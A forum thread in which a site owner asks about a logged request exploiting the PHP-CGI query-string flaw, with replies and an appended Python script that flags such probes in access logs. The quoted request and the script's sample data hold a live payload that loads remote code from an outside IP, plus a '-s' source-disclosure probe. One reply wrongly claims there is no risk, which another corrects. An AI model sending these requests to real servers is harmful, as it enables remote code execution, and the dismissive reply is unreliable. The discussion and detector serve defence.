  1. #1
    SitePoint Zealot
    Join Date
    Apr 2003
    Location
    New Zealand
    Posts
    168
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    What could this query do?

    The following has been showing up in our logs lately. Is it anything to be concerned about?

    /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt

  2. #2
    SitePoint Wizard bronze trophy chris.upjohn's Avatar
    Join Date
    Apr 2010
    Location
    Melbourne, AU
    Posts
    2,189
    Mentioned
    17 Post(s)
    Tagged
    1 Thread(s)
    Have a read of the following article http://huguesjohnson.com/programming/hacking-attempt/

  3. #3
    SitePoint Zealot
    Join Date
    Apr 2003
    Location
    New Zealand
    Posts
    168
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by chris.upjohn View Post
    Have a read of the following article http://huguesjohnson.com/programming/hacking-attempt/
    Thanks. I read that, but did not come away with a clear understanding of what to check to ensure our system is not vulnerable to this.

  4. #4
    SitePoint Wizard bronze trophy chris.upjohn's Avatar
    Join Date
    Apr 2010
    Location
    Melbourne, AU
    Posts
    2,189
    Mentioned
    17 Post(s)
    Tagged
    1 Thread(s)
    There is no risk, the guy trying to run the URL is attempting to execute PHP commands which can only be run from within a terminal shell.

  5. #5
    SitePoint Zealot
    Join Date
    Apr 2003
    Location
    New Zealand
    Posts
    168
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by chris.upjohn View Post
    There is no risk, the guy trying to run the URL is attempting to execute PHP commands which can only be run from within a terminal shell.
    Thanks for taking the time to let me know. I appreciate it.

  6. #6
    SitePoint Addict kduv's Avatar
    Join Date
    May 2012
    Location
    Maui, HI
    Posts
    211
    Mentioned
    5 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by chris.upjohn View Post
    There is no risk, the guy trying to run the URL is attempting to execute PHP commands which can only be run from within a terminal shell.
    That's not completely true. There has been a PHP vulnerability recently discovered that enables people to run remote code from the query string on PHP installations running in CGI mode or mod_cgid (not FastCGI). The logs you're currently seeing are a user trying to exploit that very vulnerability. Check to see how PHP is running on your system to know if you're vulnerable. Alternatively, you can also go to /index.php?-s and see if the source to your PHP code is displayed. If it is, you're vulnerable.

    If you're affected, there are many ways to protect against it. I'm not sure if PHP has released a "working" patch yet as I haven't been following it (I'm not affected), but I'm sure you can find out on PHP's website.
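
A log check for the request pattern discussed in this thread, as an added example that is not part of any poster's reply. It relies on the CGI rule that a query string is passed to the program as command-line arguments only when it contains no unencoded "="; the log lines are constructed and the function names are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (client addresses are documentation ranges);
# the second request is the one quoted in the first post.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2013:10:00:00 +0000] "GET /index.php?page=2&sort=-date HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2013:10:00:05 +0000] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2013:10:00:09 +0000] "GET /index.php?-s HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2013:10:01:00 +0000] "GET /search.php?-q%3Dfoo=1 HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def inspect_request(target):
    """Return None for a normal request, else a dict describing the probe."""
    path, sep, query = target.partition("?")
    # A literal "=" anywhere in the query string means CGI will not treat
    # it as command-line arguments, so such requests are not flagged.
    if not sep or "=" in query:
        return None
    # "+" and %xx are decoded before the arguments are split on whitespace.
    args = unquote_plus(query).split()
    if not args or not args[0].startswith("-"):
        return None
    # Collect ini overrides given in the "-dname=value" form for triage.
    overrides = dict(
        a[2:].partition("=")[::2] for a in args if a.startswith("-d") and len(a) > 2
    )
    return {"path": path, "args": args, "ini_overrides": overrides}


def scan(lines):
    """Return one finding per log line whose request looks like a probe."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        hit = inspect_request(m.group(1)) if m else None
        if hit:
            hit["client"] = line.split()[0]
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["client"], f["path"], f["args"][0], sorted(f["ini_overrides"]))
```

A hit only shows that someone sent the probe; whether it had any effect depends on how PHP is run on the server, as the reply above says.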

